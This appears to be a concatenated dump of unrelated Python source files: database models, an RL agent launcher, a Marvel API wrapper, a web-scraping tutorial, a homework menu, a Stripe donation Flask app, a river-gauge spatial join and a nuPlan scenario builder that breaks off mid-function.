class Event(ProxiedDictMixin, Base):
__tablename__ = 'event'
__table_args__ = (
Index('ix_event_message_id', 'message_id'),
Index('ix_event_type_id', 'event_type_id'),
Index('ix_event_generated', 'generated')
)
id = Column(Integer, primary_key=True)
message_id = Column(String(50), unique=True)
generated = Column(PreciseTimestamp())
event_type_id = Column(Integer, ForeignKey('event_type.id'))
event_type = relationship("EventType", backref=backref('event_type'))
traits = relationship("Trait",
collection_class=attribute_mapped_collection('name'))
_proxied = association_proxy("traits", "value",
creator=lambda name, value: Trait(name=name, value=value))
@property
def event_type_string(self):
return self.event_type.desc
@property
def as_dict(self):
d = dict(self._proxied)
d['message_id'] = self.message_id
d['event_type'] = self.event_type_string
d['timestamp'] = self.generated
return d
def __init__(self, message_id, event_type, generated):
self.message_id = message_id
self.event_type = event_type
self.generated = generated
def __repr__(self):
return "<Event %s ('Event : %s %s, Generated: %s')>" % (self.id,
self.message_id,
self.event_type,
self.generated)
stream_event_table = Table('streamevent', Base.metadata,
Column('stream_id', Integer, ForeignKey('stream.id'), primary_key=True),
Column('event_id', Integer,
ForeignKey('event.id'),
primary_key=True)
)
class Stream(ProxiedDictMixin, Base):
__tablename__ = 'stream'
__table_args__ = (
Index('ix_stream_name', 'name'),
Index('ix_stream_state', 'state'),
Index('ix_stream_expire_timestamp', 'expire_timestamp'),
Index('ix_stream_fire_timestamp', 'fire_timestamp')
)
id = Column(Integer, primary_key=True)
first_event = Column(PreciseTimestamp(), nullable=False)
last_event = Column(PreciseTimestamp(), nullable=False)
expire_timestamp = Column(PreciseTimestamp())
fire_timestamp = Column(PreciseTimestamp())
name = Column(String(255), nullable=False)
state = Column(Integer, default=StreamState.active, nullable=False)
state_serial_no = Column(Integer, default=0, nullable=False)
distinguished_by = relationship("DistinguishingTrait",
cascade="save-update, merge, delete, delete-orphan",
collection_class=attribute_mapped_collection('name'))
_proxied = association_proxy("distinguished_by", "value",
creator=lambda name, value: DistinguishingTrait(name=name, value=value))
events = relationship(Event, secondary=stream_event_table,
order_by=Event.generated)
@property
def distinguished_by_dict(self):
return dict(self._proxied)
def __init__(self, name, first_event, last_event=None, expire_timestamp=None,
fire_timestamp=None, state=None, state_serial_no=None):
self.name = name
self.first_event = first_event
if last_event is None:
last_event = first_event
self.last_event = last_event
self.expire_timestamp = expire_timestamp
self.fire_timestamp = fire_timestamp
if state is None:
state = StreamState.active
self.state = int(state)
if state_serial_no is None:
state_serial_no = 0
self.state_serial_no = state_serial_no
class DistinguishingTrait(PolymorphicVerticalProperty, Base):
__tablename__ = 'dist_trait'
__table_args__ = (
Index('ix_dist_trait_dt_int', 'dt_int'),
Index('ix_dist_trait_dt_float', 'dt_float'),
Index('ix_dist_trait_dt_string', 'dt_string'),
Index('ix_dist_trait_dt_datetime', 'dt_datetime'),
Index('ix_dist_trait_dt_timerange_begin', 'dt_timerange_begin'),
Index('ix_dist_trait_dt_timerange_end', 'dt_timerange_end'),
)
stream_id = Column(Integer, ForeignKey('stream.id'), primary_key=True)
name = Column(String(100), primary_key=True)
type = Column(Integer)
ATTRIBUTE_MAP = {Datatype.none: None,
Datatype.string: 'dt_string',
Datatype.int: 'dt_int',
Datatype.float: 'dt_float',
Datatype.datetime: 'dt_datetime',
Datatype.timerange:'dt_timerange',
}
dt_string = Column(String(255), nullable=True, default=None)
dt_float = Column(Float, nullable=True, default=None)
dt_int = Column(Integer, nullable=True, default=None)
dt_datetime = Column(PreciseTimestamp(),
nullable=True, default=None)
dt_timerange_begin = Column(PreciseTimestamp(), nullable=True, default=None)
dt_timerange_end = Column(PreciseTimestamp(), nullable=True, default=None)
dt_timerange = composite(DBTimeRange, dt_timerange_begin, dt_timerange_end)
@property
def as_dict(self):
return {self.name: self.value}
def __repr__(self):
return "<DistinguishingTrait(%s) %s=%s/%s/%s/%s/(%s to %s) on %s>" % (self.name,
self.type,
self.dt_string,
self.dt_float,
self.dt_int,
self.dt_datetime,
self.dt_timerange_begin,
self.dt_timerange_end,
self.stream_id)
| python |
from Step_5.A3C import A3Cagent
from Step_5.Parameter import PARA
from Step_5.A3C_NETWORK import A3C_shared_network
class MainModel:
def __init__(self):
self.worker = []
shared_model = A3C_shared_network().model
for i in range(0, 2):
self.worker.append(A3Cagent(Remote_ip=PARA.Remote_ip,
Remote_port=PARA.Remote_port + i,
CNS_ip=PARA.CNS_ip,
CNS_port=PARA.CNS_port + i,
Shared_net=shared_model
))
# 멀티프로세스 시작
jobs =[]
for __ in self.worker:
__.start()
if __name__ == '__main__':
test = MainModel() | python |
import profig
from gogetmarvel.comic import Comic
from gogetmarvel.engine import Engine
cfg = profig.Config('gogetmarvel/config.cfg')
cfg.sync()
class Marvel(object):
"""
Main marvel object connects the engine to its children.
"""
def __init__(self, private_key=None, public_key=None):
"""
Entry point of the marvel class.
Requires the API key and secret provided by marvel
developer.
"""
if not private_key or not public_key:
self.public_key = cfg['auth.public_key']
self.private_key = cfg['auth.private_key']
else:
self.public_key = public_key
self.private_key = private_key
self.engine = Engine(self.public_key, self.private_key)
self.query_comic = Comic(self.engine)
| python |
#!/usr/bin/env python
#coding:utf-8
import requests
import re
#下面三行是编码转换的功能,大家现在不用关心。
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
#header是我们自己构造的一个字典,里面保存了user-agent
header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'}
#部分网站对爬虫程序进行过滤,因此爬虫需包含浏览器头部伪装成浏览器
# html = requests.get('http://jp.tingroom.com/yuedu/yd300p/')
html = requests.get('http://jp.tingroom.com/yuedu/yd300p/',headers = header)
html.encoding = 'utf-8' #这一行是将编码转为utf-8否则中文会显示乱码。
# print html.text
# title = re.findall('color:#666666;">(.*?)</span>',html.text,re.S)
# for each in title:
# print each
#
chinese = re.findall('color: #039;">(.*?)</a>',html.text,re.S)
for each in chinese:
print each | python |
import repetition
menu_selex = 'y'
while menu_selex == 'y': #This is so that HW Menu is generated
print('\nHomework 3 Menu\n1-Factorial\n2-Sum odd numbers\n3-Exit')
selex = int(input('Please select menu item 1, 2 or 3: '))
if selex == 1: #This is the factorial part of the assignment
keep_factoring = 'y'
while keep_factoring == 'y':
num = int(input('To calculate the factorial, please enter a whole number greater than 0 but less than 10: '))
if num <= 0 or num >= 10:
print('Number entered is outside of specified range. Please enter another number in the correct range.')
num = int(input('To calculate the factorial, please enter a whole number greater than 0 but less than 10: '))
else:
factorial = repetition.get_factorial(num)
print('The factorial for', num,'is', format(factorial, ','))
keep_factoring = input('Do you want to calculate another factorial (Enter y for yes, n for no): ')
elif selex == 2: #This is the sum of odd numbers part of the assignment
keep_summing = 'y'
while keep_summing =='y':
num2 = int(input('To get sum of odd numbers, please enter a whole number greater than zero but less than 100: '))
if num2 <= 0 or num2 >= 100:
print('Numbner entered is outside of specified range. Please enter another number in the correct range.')
num2 = int(input('To get sum of odd numbers, please enter a whole number greater than zero but less than 100: '))
else:
total_odds = repetition.sum_odd_numbers(num2)
print('The sum of all odd numbers up to', num2, 'is', format(total_odds, ','))
keep_summing = input('Do you want to calculate the sum of odd numbers again (Enter y for yes, n for no): ')
elif selex == 3: #This is the exit from the menu part of the assignment
print('You have chosen to exit.')
else:
print("Invalid entry")
menu_selex = input('Do you want to continue with another menu selection (Enter y for yes, n to exit from Homework 3 Menu): ')
| python |
import os
import re
import sys
import time
import traceback
import logging
import hashlib
from urllib.parse import urlsplit, urlunsplit
from datetime import datetime
from dateutil import tz
from flask import (
Flask,
render_template,
request,
redirect,
url_for,
send_from_directory,
jsonify,
abort,
)
from werkzeug.middleware.proxy_fix import ProxyFix
import stripe
import sendgrid
from jsonschema import validate
from parse_cents import parse_cents
from python_http_client import exceptions
from applicationinsights.flask.ext import AppInsights
try:
if "WEBSITE_SITE_NAME" in os.environ:
os.environ["GIT_VERSION"] = open(
"../repository/.git/refs/heads/master", "r"
).read()
except OSError:
pass
TEST_ENVIRONMENT = os.path.basename(sys.argv[0]) == "pytest"
REDIRECT_TO_WWW = os.environ.get("REDIRECT_TO_WWW") != "false"
def require_env(k: str) -> str:
v = os.environ.get(k)
if v is None:
if TEST_ENVIRONMENT:
return f"TEST_{k}"
else:
raise KeyError(f"Missing required environment variable {k}")
return v
RECEIPT_TEMPLATE_ID = "d-7e5e6a89f9284d2ab01d6c1e27a180f8"
FAILURE_TEMPLATE_ID = "d-570b4b8b20e74ec5a9c55be7e07e2665"
SENDGRID_API_KEY = require_env("SENDGRID_API_KEY")
DONATE_EMAIL = "[email protected]"
MONTHLY_PLAN_ID = "mb-monthly-001"
LOCAL_TZ = tz.gettz("America/Los_Angeles")
stripe_keys = {
"secret_key": require_env("SECRET_KEY"),
"publishable_key": require_env("PUBLISHABLE_KEY"),
"endpoint_secret": require_env("WEBHOOK_SIGNING_SECRET"),
}
stripe.api_key = stripe_keys["secret_key"]
CANONICAL_HOSTS = os.environ.get("CANONICAL_HOST", "").split()
CHECKOUT_SCHEMA = {
"type": "object",
"description": "Start the Stripe checkout flow",
"required": ["amount"],
"properties": {
"amount": {
"type": "integer",
"description": "USD cents of donation",
"minimum": 100,
},
"metadata": {"type": "object"},
},
}
def verizonProxyHostFixer(app):
"""Azure's Verizon Premium CDN uses the header X-Host instead of X-Forwarded-Host
"""
def proxy_fixed_app(environ, start_response):
x_host = environ.get("HTTP_X_HOST")
if x_host in CANONICAL_HOSTS:
environ["HTTP_X_FORWARDED_HOST"] = x_host
return app(environ, start_response)
return proxy_fixed_app
app = Flask(__name__)
appinsights = AppInsights(app)
if CANONICAL_HOSTS:
# Azure's Verizon Premium CDN uses the header X-Host instead of X-Forwarded-Host
app.wsgi_app = verizonProxyHostFixer(ProxyFix(app.wsgi_app, x_host=1))
streamHandler = logging.StreamHandler()
app.logger.addHandler(streamHandler)
app.logger.setLevel(logging.DEBUG)
def get_telemetry_client():
requests_middleware = appinsights._requests_middleware
return requests_middleware.client if requests_middleware else None
def set_default_app_context():
requests_middleware = appinsights._requests_middleware
if requests_middleware:
envs = ["WEBSITE_SITE_NAME", "GIT_VERSION"]
for k in envs:
v = os.environ.get(k)
if v:
requests_middleware._common_properties[k] = v
set_default_app_context()
def merge_dicts(*dicts):
rval = {}
for d in dicts:
if d:
rval.update(d)
return rval
@app.template_filter("asset_url")
def asset_url(path, CACHE={}):
abspath = os.path.abspath(app.root_path + path)
# Avoid directory traversal mistakes
if not abspath.startswith(app.static_folder):
return path
try:
# Check that the file exists and use its
# size and creation time as a cache key to avoid
# computing a digest on every request
stat = os.stat(abspath)
key = stat.st_size, stat.st_mtime
cached = CACHE.get(path)
if cached is not None and cached[0] == key:
return cached[1]
# Get a SHA1 digest of the file contents
h = hashlib.sha1()
with open(abspath, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
h.update(chunk)
# Use the prefix of the digest in the URL to ensure
# the browser will receive the latest version
rval = "{}?v={}".format(path, h.hexdigest()[:8])
CACHE[path] = (key, rval)
return rval
except OSError:
# This will catch any FileNotFoundError or similar
# issues with stat, open, or read.
return path
@app.after_request
def add_cache_control_header(response):
"""Disable caching for non-static endpoints
"""
if "Cache-Control" not in response.headers:
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
return response
@app.route("/favicon.ico")
def favicon():
return send_from_directory(
os.path.join(app.root_path, "static"),
"favicon.ico",
mimetype="image/vnd.microsoft.icon",
)
@app.route("/robots.txt")
def robots():
return send_from_directory(
os.path.join(app.root_path, "static"), "robots.txt", mimetype="text/plain"
)
@app.route("/.well-known/apple-developer-merchantid-domain-association")
def apple_pay_domain_association():
return send_from_directory(
os.path.join(app.root_path, "static"),
"apple-developer-merchantid-domain-association",
mimetype="text/plain",
)
def format_identifier(s):
"""
>>> format_identifier('apple_pay')
'Apple Pay'
"""
return " ".join(map(lambda s: s.capitalize(), s.split("_")))
CARD_BRANDS = {
"amex": "American Express",
"diners": "Diners Club",
"discover": "Discover",
"jcb": "JCB",
"mastercard": "Mastercard",
"unionpay": "UnionPay",
"visa": "Visa",
}
def format_payment_method_details_source(payment_method_details):
payment_type = payment_method_details.type
if payment_type in ("card", "card_present"):
details = payment_method_details[payment_type]
parts = []
brand = CARD_BRANDS.get(details.brand)
if brand:
parts.append(brand)
if details.funding != "unknown":
parts.append(details.funding)
parts.append("card")
if details.wallet:
parts.append("({})".format(format_identifier(details.wallet.type)))
return " ".join(parts)
else:
return format_identifier(payment_type)
def sendgrid_safe_name(name):
"""The to.name, cc.name, and bcc.name personalizations cannot include either the ; or , characters.
"""
return re.sub(r"([,;]\s*)+", " ", name)
@app.route("/cancel")
def cancel():
return render_template("cancel.html", donate_email=DONATE_EMAIL)
@app.route("/success")
def success():
session_id = request.args.get("session_id")
if not session_id:
return redirect("/")
session = stripe.checkout.Session.retrieve(
session_id, expand=["payment_intent", "subscription.default_payment_method"]
)
return render_template(
"success.html", donate_email=DONATE_EMAIL, **session_info(session)
)
def session_info(session):
if session.mode == "subscription":
subscription = session.subscription
pm = subscription.default_payment_method
return merge_dicts(
{
"id": subscription.id,
"frequency": "monthly",
"amount": subscription.plan.amount * subscription.quantity,
"payment_method": format_payment_method_details_source(pm),
},
billing_details_to(pm.billing_details),
)
elif session.mode == "payment":
charge = session.payment_intent.charges.data[0]
return merge_dicts(
{
"id": charge.id,
"frequency": "one-time",
"amount": charge.amount,
"payment_method": format_payment_method_details_source(
charge.payment_method_details
),
},
billing_details_to(charge.billing_details),
)
else:
raise NotImplementedError
def session_kw(amount, frequency, metadata):
if frequency == "monthly":
return {
"mode": "subscription",
"subscription_data": {
"items": [{"plan": MONTHLY_PLAN_ID, "quantity": amount}],
"metadata": metadata,
},
}
else:
return {
"mode": "payment",
"line_items": [
{
"amount": amount,
"currency": "USD",
"name": "One-time donation",
"quantity": 1,
}
],
"submit_type": "donate",
"payment_intent_data": {"description": "Donation", "metadata": metadata},
}
@app.route("/checkout", methods=["POST"])
def checkout():
body = request.json
validate(body, CHECKOUT_SCHEMA)
amount = body["amount"]
frequency = body["frequency"]
o = urlsplit(request.url)
metadata = merge_dicts(
body.get("metadata", {}),
{"origin": urlunsplit((o.scheme, o.netloc, "", "", ""))},
)
session = stripe.checkout.Session.create(
payment_method_types=["card"],
success_url=urlunsplit(
(o.scheme, o.netloc, "/success", "session_id={CHECKOUT_SESSION_ID}", "")
),
cancel_url=urlunsplit((o.scheme, o.netloc, "/cancel", "", "")),
**session_kw(amount=amount, frequency=frequency, metadata=metadata),
)
return jsonify(sessionId=session.id)
def billing_details_to(billing_details):
return {
"name": sendgrid_safe_name(billing_details.name),
"email": billing_details.email,
}
def donor_name(billing_details):
if billing_details.name:
return f"{billing_details.name} <{billing_details.email}>"
else:
return billing_details.email
def stripe_checkout_session_completed(session):
# Subscription receipts are handled by invoice payments
if session.mode == "payment":
return stripe_checkout_session_completed_payment(
stripe.checkout.Session.retrieve(session.id, expand=["payment_intent"])
)
def get_origin(metadata):
return metadata.get(
"origin",
f"https://{CANONICAL_HOSTS[0]}" if CANONICAL_HOSTS else "http://localhost:5000",
)
def stripe_invoice_payment_succeeded(invoice):
invoice = stripe.Invoice.retrieve(
invoice.id, expand=["subscription", "payment_intent"]
)
subscription = invoice.subscription
charge = invoice.payment_intent.charges.data[0]
if is_from_new_app(subscription.metadata):
print(f"Skipping subscription email from new app: {charge.id}")
return
next_dt = datetime.fromtimestamp(subscription.current_period_end, LOCAL_TZ)
sg = sendgrid.SendGridAPIClient(SENDGRID_API_KEY)
try:
response = sg.send(
email_template_data(
template_id=RECEIPT_TEMPLATE_ID,
charge=charge,
frequency="monthly",
monthly={
"next": f"{next_dt.strftime('%b')} {next_dt.day}, {next_dt.year}",
"url": f"{get_origin(subscription.metadata)}/subscriptions/{subscription.id}",
},
)
)
if not (200 <= response.status_code < 300):
return abort(400)
except exceptions.BadRequestsError:
return abort(400)
track_donation(metadata=subscription.metadata, frequency="monthly", charge=charge)
def email_template_data(template_id, charge, frequency, **kw):
payment_method = format_payment_method_details_source(charge.payment_method_details)
return {
"template_id": template_id,
"from": {"name": "Mission Bit", "email": DONATE_EMAIL},
"personalizations": [
{
"to": [billing_details_to(charge.billing_details)],
"dynamic_template_data": merge_dicts(
{
"transaction_id": charge.id,
"frequency": frequency,
"total": "${:,.2f}".format(charge.amount * 0.01),
"date": datetime.fromtimestamp(
charge.created, LOCAL_TZ
).strftime("%x"),
"payment_method": payment_method,
"donor": donor_name(charge.billing_details),
},
kw,
),
}
],
}
def track_invoice_failure(metadata, frequency, charge):
client = get_telemetry_client()
if client is None:
return
payment_method = format_payment_method_details_source(charge.payment_method_details)
client.track_event(
"DonationFailed",
merge_dicts(
metadata,
billing_details_to(charge.billing_details),
{"id": charge.id, "frequency": frequency, "payment_method": payment_method},
),
{"amount": charge.amount},
)
def track_donation(metadata, frequency, charge):
client = get_telemetry_client()
if client is None:
return
payment_method = format_payment_method_details_source(charge.payment_method_details)
client.track_event(
"Donation",
merge_dicts(
metadata,
billing_details_to(charge.billing_details),
{"id": charge.id, "frequency": frequency, "payment_method": payment_method},
),
{"amount": charge.amount},
)
def stripe_checkout_session_completed_payment(session):
payment_intent = session.payment_intent
charge = payment_intent.charges.data[0]
payment_method = format_payment_method_details_source(charge.payment_method_details)
if is_from_new_app(payment_intent.metadata):
print(f"Skipping charge email from new app: {charge.id}")
return
sg = sendgrid.SendGridAPIClient(SENDGRID_API_KEY)
try:
response = sg.send(
email_template_data(
template_id=RECEIPT_TEMPLATE_ID, charge=charge, frequency="one-time"
)
)
if not (200 <= response.status_code < 300):
print(repr(response))
return abort(400)
except exceptions.BadRequestsError:
traceback.print_tb(sys.last_traceback)
return abort(400)
track_donation(
metadata=payment_intent.metadata, frequency="one-time", charge=charge
)
def stripe_invoice_payment_failed(invoice):
invoice = stripe.Invoice.retrieve(
invoice.id, expand=["subscription", "payment_intent"]
)
if invoice.billing_reason != "subscription_cycle":
# No email unless it's a renewal, they got an error in the
# Stripe Checkout UX for new subscriptions.
return
subscription = invoice.subscription
charge = invoice.payment_intent.charges.data[0]
if is_from_new_app(subscription.metadata):
print(f"Skipping subscription failure email from new app: {charge.id}")
return
sg = sendgrid.SendGridAPIClient(SENDGRID_API_KEY)
origin = get_origin(subscription.metadata)
try:
response = sg.send(
email_template_data(
template_id=FAILURE_TEMPLATE_ID,
charge=charge,
frequency="monthly",
failure_message=charge.failure_message,
renew_url=f"{origin}/{'${:,.2f}'.format(charge.amount * 0.01)}/?frequency=monthly",
subscription_id=subscription.id,
subscription_url=f"{origin}/subscriptions/{subscription.id}",
)
)
if not (200 <= response.status_code < 300):
return abort(400)
except exceptions.BadRequestsError:
return abort(400)
# Cancel the subscription to avoid future charges
if subscription.status != "canceled":
stripe.Subscription.delete(subscription.id)
track_invoice_failure(
metadata=subscription.metadata, frequency="monthly", charge=charge
)
def is_from_new_app(metadata):
"""Events created by the new www.missionbit.org donation portal should be ignored
"""
return metadata.get("app") == "www.missionbit.org"
@app.route("/hooks", methods=["POST"])
def stripe_webhook():
payload = request.data.decode("utf-8")
sig_header = request.headers.get("Stripe-Signature", None)
event = None
try:
event = stripe.Webhook.construct_event(
payload=payload,
sig_header=sig_header,
secret=stripe_keys["endpoint_secret"],
)
except ValueError as e:
# Invalid payload
print("Invalid hook payload")
return "Invalid payload", 400
except stripe.error.SignatureVerificationError as e:
# Invalid signature
print("Invalid hook signature")
return "Invalid signature", 400
handlers = {
"checkout.session.completed": stripe_checkout_session_completed,
"invoice.payment_succeeded": stripe_invoice_payment_succeeded,
"invoice.payment_failed": stripe_invoice_payment_failed,
}
handler = handlers.get(event["type"])
if handler is not None:
obj = event["data"]["object"]
print(f"handling {event['type']} id: {obj.id}")
handler(obj)
else:
print(f"{event['type']} not handled")
return jsonify({"status": "success"})
def host_default_amount(host):
if host.startswith("gala."):
return "$250"
else:
return "$50"
@app.route("/subscriptions/<subscription_id>")
def subscription(subscription_id):
if REDIRECT_TO_WWW:
return redirect(f"https://www.missionbit.org/donate/subscriptions/{subscription_id}")
try:
subscription = stripe.Subscription.retrieve(
subscription_id, expand=["default_payment_method"]
)
except stripe.error.InvalidRequestError:
return redirect("/")
pm = subscription.default_payment_method
next_dt = datetime.fromtimestamp(subscription.current_period_end, LOCAL_TZ)
return render_template(
"subscription.html",
donate_email=DONATE_EMAIL,
subscription=subscription,
id=subscription.id,
frequency="monthly",
amount=subscription.plan.amount * subscription.quantity,
payment_method=format_payment_method_details_source(pm),
next_cycle=f"{next_dt.strftime('%b')} {next_dt.day}, {next_dt.year}",
**billing_details_to(pm.billing_details),
)
@app.route("/subscriptions/<subscription_id>", methods=["POST"])
def delete_subscription(subscription_id):
try:
stripe.Subscription.delete(subscription_id)
except stripe.error.InvalidRequestError:
return redirect(f"/subscriptions/{subscription_id}")
return redirect(f"/subscriptions/{subscription_id}")
@app.route("/")
@app.route("/<dollars>")
@app.route("/<dollars>/")
def index(dollars=""):
if REDIRECT_TO_WWW:
return redirect("https://www.missionbit.org/donate")
host = urlsplit(request.url).netloc
frequency = (
"monthly" if request.args.get("frequency", "once") == "monthly" else "once"
)
amount = parse_cents(dollars) or parse_cents(host_default_amount(host))
return render_template(
"index.html",
key=stripe_keys["publishable_key"],
metadata=merge_dicts(request.args, {"host": host}),
frequency=frequency,
formatted_dollar_amount="{:.2f}".format(amount * 0.01)
if amount % 100
else f"{amount // 100}",
)
if CANONICAL_HOSTS:
@app.before_request
def redirect_to_cdn():
o = urlsplit(request.url)
redirect_host = CANONICAL_HOSTS[0]
if o.netloc in CANONICAL_HOSTS:
if o.scheme == "https":
return None
else:
redirect_host = o.netloc
url = urlunsplit(("https", redirect_host, o[2], o[3], o[4]))
return redirect(url, code=302)
if __name__ == "__main__":
app.run(debug=True)
| python |
# Assessing placement bias of the global river gauge network
# Nature Sustainability
# Authors: Corey A. Krabbenhoft, George H. Allen, Peirong Lin, Sarah E. Godsey, Daniel C. Allen, Ryan M. Burrows, Amanda G. DelVecchia, Ken M. Fritz, Margaret Shanafield
# Amy J. Burgin, Margaret Zimmer, Thibault Datry, Walter K. Dodds, C. Nathan Jones, Meryl C. Mims, Catherin Franklin, John C. Hammond, Samuel C. Zipper, Adam S. Ward,
# Katie H. Costigan, Hylke E. Beck, and Julian D. Olden
# Date: 2/7/2022
# This code all gauge locations, and spatially joins them with GRADES river segments
# output is the joined table of gauge ID (stationid) with GRADES river ID (COMID)
#required library
import geopandas as gpd
import pandas as pd
from shapely.geometry import Point
def find_nearest_river(dfpp,dfll,buffersize):
'''
This function finds the nearest river reach ID for each gauge
input: dfpp: point shapefile of the gauges; dfll: line shapefile of GRADES
'''
#create buffer
print(' create buffer... wait ...')
poly = dfpp.buffer(buffersize)
polygpd = gpd.GeoDataFrame(dfpp[['stationid', 'lon', 'lat']],geometry=poly)
#spatial join
print(' spatial join with flowlines.. wait ...')
join = gpd.sjoin(polygpd,dfll,how='inner',op='intersects')
merge=join.merge(dfll,on='COMID',how='left')
print(' calculating distance.. wait ...')
merge['distance']=[Point(merge['lon'][i],merge['lat'][i]).distance(merge['geometry_y'][i]) for i in range(0,len(merge))]
join11 = merge.groupby(['stationid']).agg({'distance':'min'}).reset_index() #min dist: width and MERIT
merge11 = join11.merge(merge,on=['stationid','distance'],how='left')
final = merge11[['stationid','COMID','distance','lon','lat']]
return final
if __name__ == '__main__':
#read latlon of all gauges (this is a combined gauge location database of GSIM and Beck at al)
df = pd.read_csv('New_gauge_list_revisions.csv')[['stationid','lat','lon','source']]
points = [Point(df.lon[j],df.lat[j]) for j in range(len(df))]
#create GeoDataFrame
dfpp = gpd.GeoDataFrame(df,geometry=points)
#read GRADES river segments and perform spatial join
buffersize = 0.05 #~5km
allpoints = []
for pfaf in range(1,9):
#GRADES river segment downloadable from http://hydrology.princeton.edu/data/mpan/MERIT_Basins/MERIT_Hydro_v07_Basins_v01/pfaf_level_01/
fin = '~/XXX/riv_pfaf_%01d_MERIT_Hydro_v07_Basins_v01.shp'%pfaf
print('... intersecting with %s ...'%fin)
dfll = gpd.read_file(fin)
allpoints.append(find_nearest_river(dfpp,dfll,buffersize))
allpoints = pd.concat(allpoints)
#save to file
fon = 'stationid_GRADES_v07_join.csv'
print('... writing to %s ...'%fon)
allpoints.to_csv(fon,index=False)
| python |
from __future__ import annotations
import logging
import random
from collections import defaultdict
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple, Union
from nuplan.common.actor_state.vehicle_parameters import VehicleParameters
from nuplan.database.nuplan_db.lidar_pc import LidarPc
from nuplan.database.nuplan_db.nuplandb import NuPlanDB
from nuplan.database.nuplan_db.nuplandb_wrapper import NuPlanDBWrapper
from nuplan.database.nuplan_db.scene import Scene
from nuplan.planning.scenario_builder.nuplan_db.nuplan_scenario import NuPlanScenario
from nuplan.planning.scenario_builder.nuplan_db.nuplan_scenario_utils import (
DEFAULT_SCENARIO_NAME,
ScenarioExtractionInfo,
ScenarioMapping,
)
from nuplan.planning.simulation.trajectory.trajectory_sampling import TrajectorySampling
from nuplan.planning.utils.multithreading.worker_utils import WorkerPool, worker_map
logger = logging.getLogger(__name__)
# Dictionary that holds a list of scenarios for each scenario type
ScenarioDict = Dict[str, List[NuPlanScenario]]
# Scene indices smaller that the first valid index or larger than the last valid index are dropped during filtering.
# This is done to ensure that all selected scenes have at least 20s of history/future samples.
FIRST_VALID_SCENE_IDX = 2 # First scene in a log that is considered valid for training/simulation
LAST_VALID_SCENE_IDX = -2 # Last scene in a log that is considered valid for training/simulation
@dataclass(frozen=True)
class FilterWrapper:
"""
Generic filter wrapper that encapsulates the filter's function and metadata.
"""
fn: Callable[[ScenarioDict], ScenarioDict] # function that filters the scenario dictionary
enable: bool # whether to run this filter
name: str # name of the filter
def run(self, scenario_dict: ScenarioDict) -> ScenarioDict:
"""
Run the filter if enabled.
:param scenario_dict: Input scenario dictionary.
:return: Output scenario dictionary.
"""
if not self.enable:
return scenario_dict
logger.debug(f'Running scenario filter {self.name}...')
scenario_dict = self.fn(scenario_dict) # type: ignore
logger.debug(f'Running scenario filter {self.name}...DONE')
return scenario_dict
def is_scene_valid(
scene: Scene, first_valid_idx: int = FIRST_VALID_SCENE_IDX, last_valid_idx: int = LAST_VALID_SCENE_IDX
) -> bool:
"""
Check whether the scene has enough history/future buffer and is valid for training/simulation.
:param scene: Candidate scene.
:param first_valid_idx: Index of first valid scene.
:param last_valid_idx: Index of last valid scene.
:return: Whether the scene is valid or not.
"""
scenes = scene.log.scenes
scene_idx = int(scenes.index(scene))
return first_valid_idx <= scene_idx < len(scenes) + last_valid_idx
def extract_scenes_from_log_db(
db: NuPlanDB, first_valid_idx: int = FIRST_VALID_SCENE_IDX, last_valid_idx: int = LAST_VALID_SCENE_IDX
) -> List[Scene]:
"""
Retrieve all valid scenes from a log database.
:param db: Log database to retrieve scenes from.
:param first_valid_idx: Index of first valid scene.
:param last_valid_idx: Index of last valid scene.
:return: Retrieved scenes.
"""
return list(db.scene)[first_valid_idx:last_valid_idx]
def create_scenarios_by_tokens(
scenario_tokens: List[Tuple[str, str]],
db: NuPlanDBWrapper,
log_names: Optional[List[str]],
expand_scenarios: bool,
vehicle_parameters: VehicleParameters,
ground_truth_predictions: Optional[TrajectorySampling],
) -> ScenarioDict:
"""
Create initial scenario dictionary based on desired tokens.
:param scenario_tokens: List of (log_name, lidarpc_tokens) used to initialize the scenario dict.
:param db: Object for accessing the available databases.
:param log_names: List of log names to include in the scenario dictionary.
:param expand_scenarios: Whether to expand multi-sample scenarios to multiple single-sample scenarios.
:param vehicle_parameters: Vehicle parameters for this db.
:param ground_truth_predictions: If None, no GT predictions will be extracted based on its future setting.
:return: Dictionary that holds a list of scenarios for each scenario type.
"""
logger.debug("Creating scenarios by tokens...")
# Whether to expand scenarios from multi-sample to single-sample scenarios
extraction_info = None if expand_scenarios else ScenarioExtractionInfo()
# Find all tokens that match the desired log names
if log_names:
candidate_log_names = set(log_names)
scenario_tokens = [(log_name, token) for log_name, token in scenario_tokens if log_name in candidate_log_names]
# Construct nuplan scenario objects for each (log_name, lidarpc token) pair
args = [DEFAULT_SCENARIO_NAME, extraction_info, vehicle_parameters, ground_truth_predictions]
scenarios = [NuPlanScenario(db.get_log_db(log_name), log_name, token, *args) for log_name, token in scenario_tokens]
return {DEFAULT_SCENARIO_NAME: scenarios}
def create_scenarios_by_types(
scenario_types: List[str],
db: NuPlanDBWrapper,
log_names: Optional[List[str]],
expand_scenarios: bool,
scenario_mapping: ScenarioMapping,
vehicle_parameters: VehicleParameters,
ground_truth_predictions: Optional[TrajectorySampling],
) -> ScenarioDict:
"""
Create initial scenario dictionary based on desired scenario types.
:param scenario_types: List of scenario types used to filter the pool of scenarios.
:param db: Object for accessing the available databases.
:param log_names: List of log names to include in the scenario dictionary.
:param expand_scenarios: Whether to expand multi-sample scenarios to multiple single-sample scenarios.
:param vehicle_parameters: Vehicle parameters for this db.
:param ground_truth_predictions: If None, no GT predictions will be extracted based on its future setting.
:return: Dictionary that holds a list of scenarios for each scenario type.
"""
logger.debug(f"Creating scenarios by types {scenario_types}...")
# Dictionary that holds a list of scenarios for each scenario type
scenario_dict: ScenarioDict = dict()
# Find all candidate scenario types
available_types = db.get_all_scenario_types()
candidate_types = set(scenario_types).intersection(available_types)
# Find all log dbs that match the desired log names
log_dbs = db.log_dbs
if log_names:
candidate_log_names = set(log_names)
log_dbs = [log_db for log_db in log_dbs if log_db.name in candidate_log_names]
# Populate scenario dictionary with list of scenarios for each type
for scenario_type in candidate_types:
extraction_info = None if expand_scenarios else scenario_mapping.get_extraction_info(scenario_type)
# TODO: Make scenario_tag.select_many method in DB
args = [scenario_type, extraction_info, vehicle_parameters, ground_truth_predictions]
scenario_dict[scenario_type] = [
